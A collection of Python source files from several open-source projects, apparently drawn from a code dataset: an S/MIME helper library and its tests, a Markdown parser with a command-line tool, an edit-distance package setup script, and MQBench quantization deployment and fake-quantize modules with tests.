def test_grabs_inline_tag_content(self):
sut = Element("%div Some Text")
eq_(sut.inline_content, 'Some Text')
def test_multiline_attributes(self):
sut = Element("""%link{'rel': 'stylesheet', 'type': 'text/css',
'href': '/long/url/to/stylesheet/resource.css'}""")
assert "href='/long/url/to/stylesheet/resource.css'" in sut.attributes
assert "type='text/css'" in sut.attributes
assert "rel='stylesheet'" in sut.attributes
``` |
{
"source": "a1s/python-smime",
"score": 4
} |
#### File: python-smime/smime/print_util.py
```python
def bits_to_hex(bit_array, delimiter=":"):
"""Convert a bit array to a prettily formated hex string. If the array
length is not a multiple of 8, it is padded with 0-bits from the left.
For example, [1,0,0,1,1,0,1,0,0,1,0] becomes 04:d2.
Args:
bit_array: the bit array to convert
Returns:
the formatted hex string."""
# Pad the first partial byte.
partial_bits = len(bit_array) % 8
pad_length = 8 - partial_bits if partial_bits else 0
bitstring = "0" * pad_length + "".join(map(str, bit_array))
byte_array = [int(bitstring[i: i + 8], 2) for i in range(0, len(bitstring), 8)]
return delimiter.join(map(lambda x: "%02x" % x, byte_array))
def bytes_to_hex(byte_string, delimiter=":"):
"""Convert a bytestring to a prettily formated hex string: for example,
'\x04\xd2' becomes 04:d2.
Args:
byte_string: the bytes to convert.
Returns:
the formatted hex string."""
return delimiter.join([("%02x" % ord(b)) for b in byte_string])
def int_to_hex(int_value, delimiter=":"):
"""Convert an integer to a prettily formated hex string: for example,
1234 (0x4d2) becomes 04:d2 and -1234 becomes ' -:04:d2'
Args:
int_value: the value to convert.
Returns:
the formatted hex string."""
hex_string = "%x" % int_value
ret = ""
pos = 0
# Accommodate for negative integers.
if hex_string[0] == "-":
ret += " -" + delimiter
hex_string = hex_string[1:]
# If the first digit is a half-byte, pad with a 0.
remaining_len = len(hex_string) - pos
hex_string = hex_string.zfill(remaining_len + remaining_len % 2)
byte_values = [hex_string[i: i + 2] for i in range(pos, len(hex_string), 2)]
return ret + delimiter.join(byte_values)
def wrap_lines(long_string, wrap):
"""Split the long string into line chunks according to the wrap limit and
existing newlines.
Args:
long_string: a long, possibly multiline string
wrap: maximum number of characters per line. 0 or negative
wrap means no limit.
Returns:
a list of lines of at most |wrap| characters each."""
if not long_string:
return []
long_lines = long_string.decode("utf-8").split("\n")
if wrap <= 0:
return long_lines
ret = []
for line in long_lines:
if not line:
# Empty line
ret += [line]
else:
ret += [line[i: i + wrap] for i in range(0, len(line), wrap)]
return ret
def append_lines(lines, wrap, buf):
"""Append lines to the buffer. If the first line can be appended to the last
line of the buf without exceeding wrap characters, the two lines are merged.
Args:
lines: an iterable of lines to append
wrap: maximum number of characters per line. 0 or negative wrap means
no limit.
buf: an iterable of lines to append to"""
if not lines:
return
if not buf or wrap > 0 and len(buf[-1]) + len(lines[0]) > wrap:
buf += lines
else:
buf[-1] += lines[0]
buf += lines[1:]
```
#### File: smime/tests/test_encrypt.py
```python
import os
import sys
from email import message_from_string
from subprocess import PIPE
from subprocess import Popen
from tempfile import mkstemp
from smime.api import encrypt
def get_cmd_output(args):
child = Popen(args, stdout=PIPE, stderr=PIPE)
result = []
while True:
for line in iter(child.stdout.readline, ""):
result.append(line)
if child.poll() is not None:
break
if child.returncode != 0:
error = []
for line in iter(child.stderr.readline, ""):
error.append(line)
sys.stderr.write("Command: %s\n%s" % (" ".join(args), "".join(error)))
return "\n".join(result)
def assert_message_to_carl(settings, algorithm):
message = [
'From: "Alice" <<EMAIL>>',
'To: "Carl" <<EMAIL>>',
"Subject: A message from python",
"",
"Now you see me.",
]
with open(settings['carl_public_certificate']) as cert:
result = encrypt(u"\n".join(message), cert.read(), algorithm=algorithm)
fd, tmp_file = mkstemp()
os.write(fd, result)
cmd = [
"openssl",
"smime",
"-decrypt",
"-in",
tmp_file,
"-inkey",
settings['carl_private_certificate'],
]
cmd_output = get_cmd_output(cmd)
private_message = message_from_string(cmd_output)
payload = private_message.get_payload().splitlines()
assert "Now you see me." == payload[len(payload) - 1]
return 1
def test_message_to_carl_aes256_cbc(base_settings):
settings = base_settings
assert assert_message_to_carl(settings, u"aes256_cbc") == 1
def test_message_to_carl_aes192_cbc(base_settings):
settings = base_settings
assert assert_message_to_carl(settings, u"aes192_cbc") == 1
def test_message_to_carl_aes128_cbc(base_settings):
settings = base_settings
assert assert_message_to_carl(settings, u"aes128_cbc") == 1
```
#### File: smime/tests/test_print_util.py
```python
from smime import print_util
def test_bits_to_hex():
bit_array = [0, 1, 1, 0, 1, 0, 1, 1, 1, 0]
assert "01:ae" == print_util.bits_to_hex(bit_array)
assert "01ae" == print_util.bits_to_hex(bit_array, delimiter="")
assert "" == print_util.bits_to_hex("")
def test_bytes_to_hex():
byte_array = "\x01\xae"
assert "01:ae" == print_util.bytes_to_hex(byte_array)
assert "01ae" == print_util.bytes_to_hex(byte_array, delimiter="")
assert "" == print_util.bytes_to_hex("")
def test_int_to_hex():
integer = 1234 # 0x4d2
assert "04:d2" == print_util.int_to_hex(integer)
assert "04d2" == print_util.int_to_hex(integer, delimiter="")
negative_integer = -1234
assert " -:04:d2" == print_util.int_to_hex(negative_integer)
def test_wrap_lines():
long_multiline_string = "hello\nworld"
assert ["hel", "lo", "wor", "ld"] == print_util.wrap_lines(long_multiline_string, 3)
def test_wrap_lines_no_wrap():
long_multiline_string = "hello\nworld"
assert ["hello", "world"] == print_util.wrap_lines(long_multiline_string, 0)
def test_append_lines_appends():
buf = ["hello"]
lines = ["beautiful", "world"]
# "hellobeautiful" is more than 10 characters long
print_util.append_lines(lines, 20, buf)
assert ["hellobeautiful", "world"] == buf
def test_append_lines_honours_wrap():
buf = ["hello"]
lines = ["beautiful", "world"]
# "hellobeautiful" is more than 10 characters long
print_util.append_lines(lines, 10, buf)
assert ["hello", "beautiful", "world"] == buf
``` |
{
"source": "a1trl9/curris",
"score": 3
} |
#### File: curris/curris/block.py
```python
from curris import helper
from curris.span import parse_span
def parse_block(line, target, attrs):
"""main function
"""
if line == -1:
_try_finalize_table(target, attrs)
return target
length = len(line)
if length == 0:
_try_finalize_table(target, attrs)
target.append({'block_type': 'blank'})
return target
result = _handle_code_block(line, length, target, attrs) or\
_handle_table(line, length, target, attrs)
if result:
return target
_try_finalize_table(target, attrs)
result = _handle_header(line, length, target)
if result:
return target
result = _check_block_quotes(line, length) or _check_unorder_list_item(line, length) or \
_check_order_list_item(line, length)
if result:
target.append(result)
else:
_handle_indent(line, length, target, attrs)
return target
def _handle_code_block(line, length, target, attrs):
result = _check_code_block(line, length)
if result:
attrs['code_block'] = not attrs['code_block']
target.append(result)
return True
if attrs['code_block']:
target.append({'block_type': 'code', 'content': line})
return True
return False
def _handle_table(line, length, target, attrs):
result = _check_table(line, length)
if result:
if not attrs['table_block']:
attrs['table_block'] = True
target.append(result)
return True
return False
def _handle_header(line, length, target):
result = _check_header(line, length)
if result:
if 'prev_block_type' in result and target:
if 'indent' in target[-1]:
del target[-1]['indent']
target[-1]['block_type'] = result['prev_block_type']
else:
target.append(result)
return True
return False
def _try_finalize_table(target, attrs):
if attrs['table_block']:
attrs['table_block'] = False
_build_table(target)
def _handle_indent(line, length, target, attrs):
result = _check_indent(line, length)
if result['indent'] == 0:
del result['indent']
if target and ('block_type' not in target[-1] or \
target[-1]['block_type'] in ['normal', 'block_quotes']):
target[-1]['content'].append({'span_type': 'text', 'content': '\n'})
target[-1]['content'].append(result['content'])
else:
target.append(result)
elif target and 'block_type' in target[-1] and target[-1]['block_type'] in\
['order_list_item', 'unorder_list_item', 'block_quotes']:
parse_block(result['content'][0], target[-1]['content'], {'code_block': False,
'table_block': False})
else:
parse_block(result['content'][0], target, attrs)
def _check_header(line, length):
"""check if headers
first_header_line :: <=>+
second_header_line :: <->+
normal_header :: <#>+<span_element>
"""
if length * '=' == line:
return {'prev_block_type': 'h1'}
if length * '-' == line:
return {'prev_block_type': 'h2'}
if length > 0 and line[0] == '#':
index = 1
while index < length and line[index] == '#':
index += 1
level = min(6, index)
# Ignore any ending '#'
end_index = length - 1
while end_index >= 0 and line[end_index] == '#':
end_index -= 1
index += helper.elimate_leading_whitespace(line[index:])
return {'block_type': 'h{}'.format(level),
'content': [parse_span(line[index:end_index + 1], [])]}
def _check_block_quotes(line, length):
""" check if blockquotes
block_quotes :: <rab>+<block_element>
"""
if length > 0 and line[0] == '>':
index = 1
index += helper.elimate_leading_whitespace(line[index:])
new_attrs = {'code_block': False, 'table_block': False}
return {'block_type': 'block_quotes', 'content': parse_block(line[index:], [], new_attrs)}
def _check_unorder_list_item(line, length):
"""check if unorder lists
"""
if length > 1 and line[0] in '-*+' and line[1] == ' ':
return {'block_type': 'unorder_list_item', 'content':[parse_span(line[2:], [])]}
def _check_order_list_item(line, length):
"""check if order lists
"""
index = 0
while index < length and line[index].isdecimal():
index += 1
if index + 1 < length and line[index] == '.' and line[index + 1] == ' ':
return {'block_type': 'order_list_item', 'content': [parse_span(line[index + 2:], [])]}
def _check_code_block(line, length):
"""check if code block
"""
if length > 2 and line[:3] == '```':
language = line[3:]
return {'block_type': 'code_block', 'language': language}
def _check_indent(line, length):
if length > 1 and line[0] == '\t':
return {'indent': 1, 'content': [line[1:]]}
elif line[:4] == ' ' * 4:
return {'indent': 1, 'content': [line[4:]]}
return {'indent': 0, 'content': [parse_span(line, [])], 'block_type': 'normal'}
def _build_table(target):
table = []
while target and target[-1]['block_type'] == 'potential_table':
table.append(target.pop())
table = table[::-1]
length = len(table)
if length < 2:
_build_table_as_normal(target, table)
return
# check header
sep_line = table[1]
is_seps = _check_table_seps(sep_line['content'], sep_line['seps'])
if not is_seps['is_seps']:
_build_table_as_normal(target, table)
return
info = is_seps['content']
header = _check_table_content(table[0]['content'], table[0]['seps'],
info, True)
content = [_check_table_content(i['content'], i['seps'], info)\
for i in table[2:]]
table = {'block_type': 'table', 'content': {
'header': header,
'body': content
}}
target.append(table)
def _build_table_as_normal(target, table):
content = [parse_span(i['content'], []) for i in table]
if target and target[-1]['block_type'] == 'normal':
for unit in content:
target[-1]['content'].append(unit)
else:
target.append({'block_type': 'normal', 'content': content})
def _check_table_seps(line, seps):
index = 0
length = len(line)
content = []
if seps and seps[0] == 0:
index += 1
seps = seps[1:]
for sep in seps:
content.append(line[index:sep])
index = sep + 1
if seps and seps[-1] + 1 < length:
content.append(line[index:])
for unit in content:
if len(unit) < 3:
break
if '---' not in unit or unit[0] not in ':-' or unit[-1] not in ':-':
break
else:
for index, unit in enumerate(content):
if unit[-1] == ':' and unit[0] == ':':
content[index] = 1
elif unit[-1] == ':':
content[index] = 2
else:
content[index] = 0
return {'is_seps': True, 'content': content}
return {'is_seps': False}
def _check_table_content(line, seps, info, is_header=False):
symbol = 'th' if is_header else 'td'
index = 0
length = len(line)
content = []
required = len(info)
if seps and seps[0] == 0:
index += 1
seps = seps[1:]
for sep in seps:
content.append(line[index:sep])
index = sep + 1
if seps and seps[-1] + 1 < length:
content.append(line[index:])
for index, unit in enumerate(content):
content[index] = {'block_type': symbol, 'content': parse_span(unit, []),
'align': info[index]}
c_length = len(content)
while c_length < required:
content.append({'block_type': symbol, 'content': parse_span('', []),
'align': info[c_length]})
c_length += 1
return {'block_type': 'tr', 'content': content}
def _check_table(line, length):
index = 0
if '|' in line:
seps = []
while index < length:
if line[index] == '\\':
index += 2
continue
if line[index] == '|':
seps.append(index)
index += 1
return {'block_type': 'potential_table', 'seps': seps,
'content': line}
```
#### File: curris/curris/cli.py
```python
import argparse
import json
from curris.parser import parse
from curris.render.html import build_html
from curris.render.render_to_file import render_to_file
def _build_arg_parser():
parser = argparse.ArgumentParser()
parser.add_argument('-html', action='store_true', help='render to html')
parser.add_argument('-css', help='add css source file')
parser.add_argument('-style', help='add css style string')
parser.add_argument('-o', help='output file path')
parser.add_argument('-s', help='source file path')
return parser
def main():
""" cli entry
"""
arg_parser = _build_arg_parser()
args = arg_parser.parse_args()
if not args.s:
return
parsed = ''
with open(args.s) as reader:
target = reader.read()
parsed = parse(target)
if args.html:
file_type = 'html'
css_source = args.css if args.css else None
css_string = args.style if args.style else None
rendered = build_html(parsed, css_source, css_string)
else:
file_type = 'json'
rendered = json.dumps(parsed)
if args.o:
render_to_file(rendered, args.o)
else:
file_path = 'output.' + file_type
render_to_file(rendered, file_path)
```
#### File: curris/render/render_to_file.py
```python
def render_to_file(content, path):
""" render entry
"""
with open(path, 'w') as writer:
writer.write(content)
``` |
{
"source": "a1trl9/flatwhite",
"score": 2
} |
#### File: a1trl9/flatwhite/setup.py
```python
import sys
from distutils.command.build_ext import build_ext
from setuptools import setup, Extension
from setuptools.command.test import test as Test
class PyTest(Test):
""" pytest class
"""
def finalize_options(self):
Test.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errcode = pytest.main(self.test_args)
sys.exit(errcode)
setup(
name='flatwhite',
version='0.0.1',
license='MIT License',
author='a1trl9',
tests_require=['pytest'],
install_requires=[],
packages=['flatwhite'],
cmdclass={'test': PyTest},
author_email='<EMAIL>',
description='ED Algorithm',
include_package_data=True,
platforms='any',
# test_suite='',
classifiers=[
'Programming Language :: Python',
'Development Status :: 0 - Alpha',
'Natural Language :: English',
'License :: MIT License',
'Operating System :: OS Independent',
'Topic :: Global/Local Edit Distance'
],
extras_require={
'testing': ['pytest']
},
ext_modules=[
Extension('flatwhite.cflatwhite',
['cflatwhite/dr.c',
'cflatwhite/ged.c',
'cflatwhite/led.c',
'cflatwhite/tf_idf.c',
'cflatwhite/ngram.c',
'cflatwhite/hashmap.c',
]
)
]
)
``` |
{
"source": "a1trl9/MQBench",
"score": 2
} |
#### File: mqbench/deploy/deploy_linear.py
```python
import json
import os
import onnx
import numpy as np
from onnx import numpy_helper
from mqbench.utils.logger import logger
from mqbench.deploy.common import (
update_inp2node_out2node,
prepare_initializer,
prepare_data,
OnnxPreprocess,
get_constant_inputs,
parse_attrs
)
try:
from .convert_xir import XIR_process
USE_XIR = True
except (ModuleNotFoundError, AssertionError, ImportError):
USE_XIR = False
PERCHANNEL_FAKEQUANTIZER = ['FakeQuantizeLearnablePerchannelAffine',
'FixedPerChannelAffine',
'FakeQuantizeDSQPerchannel']
PERTENSOR_FAKEQUANTIZER = ['LearnablePerTensorAffine',
'FixedPerTensorAffine',
'FakeQuantizeDSQPertensor',
'FakeQuantizeTqtAffine']
ALL_FAKEQUANTIZER = PERCHANNEL_FAKEQUANTIZER + PERTENSOR_FAKEQUANTIZER
class LinearQuantizer_process(object):
# some method like dorefa need pre-compute weights
def weight_preprocess(self, target_tensor, out2node, inp2node, named_initializer):
def find_weight(tensor):
if tensor not in named_initializer:
_node = out2node[tensor]
for inp in _node.input:
return find_weight(inp)
return tensor
weight = find_weight(target_tensor)
# TODO need more general method, like onnxruntime infer
data = numpy_helper.to_array(named_initializer[weight])
data = np.tanh(data)
data = data / (np.max(np.abs(data)) + 1e-5)
data = numpy_helper.from_array(data)
named_initializer[weight].raw_data = data.raw_data
redundant_nodes = []
def find_redundant_nodes(tensor):
if tensor == target_tensor:
return
nodes = inp2node[tensor]
for node, idx in nodes:
if node not in redundant_nodes:
redundant_nodes.append(node)
redundant_nodes.extend(get_constant_inputs(node, out2node))
find_redundant_nodes(node.output[0])
find_redundant_nodes(weight)
return weight, redundant_nodes
def deal_with_weight_fakequant(self, node, out2node, inp2node, named_initializer):
next_nodes = inp2node[node.output[0]]
assert len(next_nodes) == 1
next_node, idx = next_nodes[0]
assert next_node.op_type in ['Conv', 'Gemm', 'ConvTranspose']
redundant_nodes = []
if node.input[0] not in named_initializer:
node.input[0], redundant_nodes = \
self.weight_preprocess(node.input[0], out2node, inp2node, named_initializer)
next_node.input[idx] = node.input[0]
return redundant_nodes
def deal_with_activation_fakequant(self, node, inp2node):
next_nodes = inp2node[node.output[0]]
for next_node, idx in next_nodes:
next_node.input[idx] = node.input[0]
return
def parse_qparams(self, node, name2data):
tensor_name, scale, zero_point = node.input[:3]
scale, zero_point = name2data[scale], name2data[zero_point]
if len(node.input) > 3:
qmin, qmax = node.input[-2:]
qmin, qmax = name2data[qmin], name2data[qmax]
elif len(node.attribute) > 0:
qparams = parse_attrs(node.attribute)
qmin = qparams['quant_min']
qmax = qparams['quant_max']
else:
logger.info(f'qmin and qmax are not found for <{node.name}>!')
return tensor_name, scale, zero_point, qmin, qmax
def clip_weight(self, node, name2data, inp2node, named_initializer):
tensor_name, scale, zero_point, qmin, qmax = self.parse_qparams(node, name2data)
data = name2data[tensor_name]
clip_range_min = (qmin - zero_point) * scale
clip_range_max = (qmax - zero_point) * scale
if scale.shape[0] > 1:
new_data = []
transposed = False
next_node = inp2node[node.output[0]]
if len(next_node) == 1 and next_node[0][0].op_type == 'ConvTranspose':
transposed = True
data = data.transpose(1, 0, 2, 3)
for c in range(data.shape[0]):
new_data.append(np.clip(data[c], clip_range_min[c], clip_range_max[c]))
new_data = np.array(new_data)
if transposed:
new_data = new_data.transpose(1, 0, 2, 3)
logger.info(f'Clip weights <{tensor_name}> to per-channel ranges.')
else:
new_data = np.clip(data, clip_range_min, clip_range_max)
logger.info(f'Clip weights <{tensor_name}> to range [{clip_range_min}, {clip_range_max}].')
new_data = numpy_helper.from_array(new_data)
named_initializer[tensor_name].raw_data = new_data.raw_data
def post_process_clip_ranges(self, clip_ranges, graph, inp2node):
def find_the_closest_clip_range(node):
if node.input[0] in clip_ranges:
return node.input[0]
elif node.op_type in ['Flatten', 'Resize'] and node.output[0] in inp2node:
return find_the_closest_clip_range(inp2node[node.output[0]][0][0])
else:
return None
for node in graph.node:
if node.op_type in ['Flatten', 'Resize']:
tensor_name = find_the_closest_clip_range(node)
if tensor_name:
clip_ranges[node.input[0]] = clip_ranges[tensor_name]
logger.info(f'Pass <{tensor_name}> clip range to <{node.name}> input <{node.input[0]}>.')
return clip_ranges
def remove_fakequantize_and_collect_params(self, onnx_path, model_name, backend):
model = onnx.load(onnx_path)
graph = model.graph
out2node, inp2node = update_inp2node_out2node(graph)
name2data = prepare_data(graph)
named_initializer = prepare_initializer(graph)
preprocess = OnnxPreprocess()
preprocess.replace_resize_op_with_upsample(graph, out2node)
preprocess.remove_fake_pad_op(graph, name2data, inp2node, out2node)
out2node, inp2node = update_inp2node_out2node(graph)
clip_ranges = {}
nodes_to_be_removed = []
for node in graph.node:
if node.op_type in ALL_FAKEQUANTIZER:
nodes_to_be_removed.append(node)
nodes_to_be_removed.extend(get_constant_inputs(node, out2node))
if node.op_type in PERCHANNEL_FAKEQUANTIZER:
# fake quantize for weights, suppose per-channel quantize only for weight
redundant_nodes = self.deal_with_weight_fakequant(node, out2node, inp2node, named_initializer)
nodes_to_be_removed.extend(redundant_nodes)
self.clip_weight(node, name2data, inp2node, named_initializer)
if backend == 'ppl':
tensor_name, scale, zero_point, qmin, qmax = self.parse_qparams(node, name2data)
clip_ranges[tensor_name] = {'step': [float(x) for x in scale],
'zero_point': [int(x) for x in zero_point],
'min': [float(x) for x in scale * (qmin - zero_point)],
'max': [float(x) for x in scale * (qmax - zero_point)],
'bit': int(np.log2(qmax - qmin + 1)),
'type': "biased",
}
elif backend == 'vitis':
logger.info("Vitis-DPU does not support per-channel quatization.")
raise NotImplementedError("Vitis-DPU does not support per-channel quatization.")
elif node.op_type in PERTENSOR_FAKEQUANTIZER:
if node.output[0] not in inp2node:
assert node.output[0] in [l.name for l in graph.output]
inp2node[node.output[0]] = []
next_nodes = inp2node[node.output[0]]
if len(next_nodes) == 1 and next_nodes[0][1] == 1 and next_nodes[0][0].op_type in ['Gemm', 'Conv']:
# fake quantize for weights
redundant_nodes = self.deal_with_weight_fakequant(node, out2node, inp2node, named_initializer)
tensor_name, scale, zero_point, qmin, qmax = self.parse_qparams(node, name2data)
nodes_to_be_removed.extend(redundant_nodes)
self.clip_weight(node, name2data, inp2node, named_initializer)
else:
# fake quantize for activations
self.deal_with_activation_fakequant(node, inp2node)
tensor_name, scale, zero_point, qmin, qmax = self.parse_qparams(node, name2data)
for out in graph.output:
if out.name == node.output[0]:
out.name = tensor_name
if backend == 'tensorrt':
clip_ranges[tensor_name] = float(scale * min(-qmin, qmax))
elif backend == 'snpe':
clip_ranges[tensor_name] = [
{'bitwidth': int(np.log2(qmax - qmin + 1)),
'min': float(scale * (qmin - zero_point)),
'max': float(scale * (qmax - zero_point))}
]
if backend == 'ppl':
clip_ranges[tensor_name] = {'step': float(scale),
'zero_point': int(zero_point),
'min': float(scale * (qmin - zero_point)),
'max': float(scale * (qmax - zero_point)),
'bit': int(np.log2(qmax - qmin + 1)),
'type': "biased",
}
elif backend == 'vitis':
clip_ranges[tensor_name] = {'scale': float(scale)}
elif backend == 'ppl-cuda':
clip_ranges[tensor_name] = float(max(-scale * (qmin - zero_point), scale * (qmax - zero_point)))
for node in nodes_to_be_removed:
graph.node.remove(node)
clip_ranges = self.post_process_clip_ranges(clip_ranges, graph, inp2node)
if backend == 'tensorrt':
context = {"tensorrt": {"blob_range": clip_ranges}}
elif backend == 'snpe':
context = {'activation_encodings': clip_ranges, 'param_encodings': {}}
elif backend == 'ppl':
context = {"ppl": clip_ranges}
elif backend == 'vitis':
context = {'vitis': clip_ranges}
elif backend == 'ppl-cuda':
context = {'ppl-cuda': clip_ranges}
output_path = os.path.dirname(onnx_path)
context_filename = os.path.join(output_path, '{}_clip_ranges.json'.format(model_name))
with open(context_filename, 'w') as f:
json.dump(context, f, indent=4)
onnx_filename = os.path.join(output_path, '{}_deploy_model.onnx'.format(model_name))
onnx.save(model, onnx_filename)
# do post processing for vitis
if backend == 'ppl-cuda':
with open(context_filename, 'w') as f:
for k, v in clip_ranges.items():
f.write('{}: {}\n'.format(k, v))
if backend == 'vitis' and USE_XIR:
xir_compiler = XIR_process()
xir_compiler.do_compile(onnx.load(onnx_path), onnx.load(filename), name=filename)
logger.info("Finish xmodel converting process.")
logger.info("Finish deploy process.")
remove_fakequantize_and_collect_params = LinearQuantizer_process().remove_fakequantize_and_collect_params
```
#### File: mqbench/fake_quantize/lsq.py
```python
from functools import partial
import torch
from torch.nn.parameter import Parameter
from mqbench.fake_quantize.quantize_base import QuantizeBase
from mqbench.utils import is_symmetric_quant, is_tracing_state
class LearnableFakeQuantize(QuantizeBase):
r""" This is an extension of the FakeQuantize module in fake_quantize.py, which
supports more generalized lower-bit quantization and support learning of the scale
and zero point parameters through backpropagation. For literature references,
please see the class _LearnableFakeQuantizePerTensorOp.
In addition to the attributes in the original FakeQuantize module, the _LearnableFakeQuantize
module also includes the following attributes to support quantization parameter learning.
"""
def __init__(self, observer, scale=1., zero_point=0., use_grad_scaling=True, **observer_kwargs):
super(LearnableFakeQuantize, self).__init__(observer, **observer_kwargs)
self.use_grad_scaling = use_grad_scaling
self.scale = Parameter(torch.tensor([scale]))
self.zero_point = Parameter(torch.tensor([zero_point]))
self.register_buffer('eps', torch.tensor([torch.finfo(torch.float32).eps]))
# Check whether the module will load a state dict;
# Initialize the shape of per-channel 'scale' and 'zero-point' before copying values
class PerChannelLoadHook:
def __init__(self, module):
self.hook = module._register_load_state_dict_pre_hook(partial(self.hook_fn, module=module))
def hook_fn(self, state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs,
module):
if module.ch_axis == -1:
# no per-channel parameters
return
for module_key, param in module._parameters.items():
if module_key not in ["scale", "zero_point"]:
continue
candidate = prefix + module_key
if candidate in state_dict:
input_param = state_dict[candidate]
if param.shape != input_param.shape:
param.data = torch.ones_like(input_param, dtype=param.dtype, device=param.device)
def close(self):
self.hook.remove()
self.load_state_dict_hook = PerChannelLoadHook(self)
@torch.jit.export
def extra_repr(self):
return 'fake_quant_enabled={}, observer_enabled={}, ' \
'quant_min={}, quant_max={}, dtype={}, qscheme={}, ch_axis={}, ' \
'scale={}, zero_point={}'.format(
self.fake_quant_enabled, self.observer_enabled,
self.quant_min, self.quant_max,
self.dtype, self.qscheme, self.ch_axis, self.scale if self.ch_axis == -1 else 'List',
self.zero_point if self.ch_axis == -1 else 'List')
def forward(self, X):
# Learnable fake quantize have to zero_point.float() to make it learnable.
if self.observer_enabled[0] == 1:
self.activation_post_process(X.detach())
_scale, _zero_point = self.activation_post_process.calculate_qparams()
_scale = _scale.to(self.scale.device)
_zero_point = _zero_point.to(self.zero_point.device)
if self.ch_axis != -1:
self.scale.data = torch.ones_like(_scale)
self.zero_point.data = torch.zeros_like(_zero_point.float())
self.scale.data.copy_(_scale)
self.zero_point.data.copy_(_zero_point.float())
else:
self.scale.data.abs_()
self.scale.data.clamp_(min=self.eps.item())
if self.fake_quant_enabled[0] == 1:
if is_symmetric_quant(self.qscheme):
self.zero_point.data.zero_()
else:
self.zero_point.data.clamp_(self.quant_min, self.quant_max).float()
if self.is_per_channel:
if self.use_grad_scaling:
grad_factor = 1.0 / (X.numel() / X.shape[self.ch_axis] * self.quant_max) ** 0.5
else:
grad_factor = 1.0
if is_tracing_state():
X = FakeQuantizeLearnablePerchannelAffine.apply(
X, self.scale, self.zero_point, self.ch_axis,
self.quant_min, self.quant_max, grad_factor)
else:
X = _fake_quantize_learnable_per_channel_affine_training(
X, self.scale, self.zero_point, self.ch_axis,
self.quant_min, self.quant_max, grad_factor)
else:
if self.use_grad_scaling:
grad_factor = 1.0 / (X.numel() * self.quant_max) ** 0.5
else:
grad_factor = 1.0
X = torch._fake_quantize_learnable_per_tensor_affine(
X, self.scale, self.zero_point,
self.quant_min, self.quant_max, grad_factor)
return X
def _fake_quantize_learnable_per_channel_affine_training(x, scale, zero_point, ch_axis, quant_min, quant_max, grad_factor):
zero_point = (zero_point.round() - zero_point).detach() + zero_point
new_shape = [1] * len(x.shape)
new_shape[ch_axis] = x.shape[ch_axis]
scale = grad_scale(scale, grad_factor).reshape(new_shape)
zero_point = grad_scale(zero_point, grad_factor).reshape(new_shape)
x = x / scale + zero_point
x = (x.round() - x).detach() + x
x = torch.clamp(x, quant_min, quant_max)
return (x - zero_point) * scale
def grad_scale(t, scale):
return (t - (t * scale)).detach() + (t * scale)
class FakeQuantizeLearnablePerchannelAffine(torch.autograd.Function):
@staticmethod
def forward(ctx, x, scale, zero_point, ch_axis, quant_min, quant_max, grad_factor):
return _fake_quantize_learnable_per_channel_affine_training(x, scale, zero_point, ch_axis,
quant_min, quant_max, grad_factor)
@staticmethod
def symbolic(g, x, scale, zero_point, ch_axis, quant_min, quant_max, grad_factor):
return g.op("::FakeQuantizeLearnablePerchannelAffine", x, scale, zero_point, quant_min_i=quant_min, quant_max_i=quant_max)
```
#### File: intrinsic/modules/fused.py
```python
from torch.nn.intrinsic import _FusedModule
from torch.nn import Linear, BatchNorm1d, BatchNorm2d, ReLU, ConvTranspose2d, Conv2d
class LinearBn1d(_FusedModule):
r"""This is a sequential container which calls the Linear and Batch Norm 1d modules.
During quantization this will be replaced with the corresponding fused module."""
def __init__(self, linear, bn):
assert type(linear) == Linear and type(bn) == BatchNorm1d, \
'Incorrect types for input modules{}{}'.format(
type(linear), type(bn))
super().__init__(linear, bn)
class ConvTransposeBn2d(_FusedModule):
def __init__(self, deconv, bn):
assert type(deconv) == ConvTranspose2d and type(bn) == BatchNorm2d, \
'Incorrect types for input modules{}{}'.format(
type(deconv), type(bn))
super().__init__(deconv, bn)
class ConvTransposeBnReLU2d(_FusedModule):
def __init__(self, deconv, bn, relu):
assert type(deconv) == ConvTranspose2d and type(bn) == BatchNorm2d and type(relu) == ReLU, \
'Incorrect types for input modules{}{}{}'.format(
type(deconv), type(bn), type(relu))
super().__init__(deconv, bn, relu)
class ConvTransposeReLU2d(_FusedModule):
def __init__(self, deconv, relu):
assert type(deconv) == ConvTranspose2d and type(relu) == ReLU, \
'Incorrect types for input modules{}{}'.format(
type(deconv), type(relu))
super().__init__(deconv, relu)
class ConvBn2d(_FusedModule):
def __init__(self, conv, bn):
assert type(conv) == Conv2d and type(bn) == BatchNorm2d, \
'Incorrect types for input modules{}{}'.format(
type(conv), type(bn))
super().__init__(conv, bn)
class ConvBnReLU2d(_FusedModule):
def __init__(self, conv, bn, relu):
assert type(conv) == Conv2d and type(bn) == BatchNorm2d and type(relu) == ReLU, \
'Incorrect types for input modules{}{}{}'.format(
type(conv), type(bn), type(relu))
super().__init__(conv, bn, relu)
class ConvReLU2d(_FusedModule):
def __init__(self, conv, relu):
assert type(conv) == Conv2d and type(relu) == ReLU, \
'Incorrect types for input modules{}{}'.format(
type(conv), type(relu))
super().__init__(conv, relu)
```
#### File: test/observer/test_observer.py
```python
import torch
import unittest
from mqbench.prepare_by_platform import prepare_by_platform, BackendType
from mqbench.convert_deploy import convert_deploy
from mqbench.utils.state import enable_calibration, enable_quantization
class TestObserver(unittest.TestCase):
def test_quantile_observer(self):
model_to_quantize = torch.hub.load('pytorch/vision', 'resnet18', pretrained=False)
dummy_input = torch.randn(2, 3, 224, 224, device='cpu')
model_to_quantize.train()
extra_qconfig_dict = {
'w_observer': 'MinMaxObserver',
'a_observer': 'EMAQuantileObserver',
'w_fakequantize': 'FixedFakeQuantize',
'a_fakequantize': 'FixedFakeQuantize',
}
prepare_custom_config_dict = {'extra_qconfig_dict': extra_qconfig_dict}
model_prepared = prepare_by_platform(model_to_quantize, BackendType.Tensorrt, prepare_custom_config_dict)
enable_calibration(model_prepared)
model_prepared(dummy_input)
enable_quantization(model_prepared)
loss = model_prepared(dummy_input).sum()
loss.backward()
def test_ema_observer(self):
model_to_quantize = torch.hub.load('pytorch/vision', 'resnet18', pretrained=False)
dummy_input = torch.randn(2, 3, 224, 224, device='cpu')
model_to_quantize.train()
extra_qconfig_dict = {
'w_observer': 'MinMaxObserver',
'a_observer': 'EMAMinMaxObserver',
'w_fakequantize': 'FixedFakeQuantize',
'a_fakequantize': 'FixedFakeQuantize',
}
prepare_custom_config_dict = {'extra_qconfig_dict': extra_qconfig_dict}
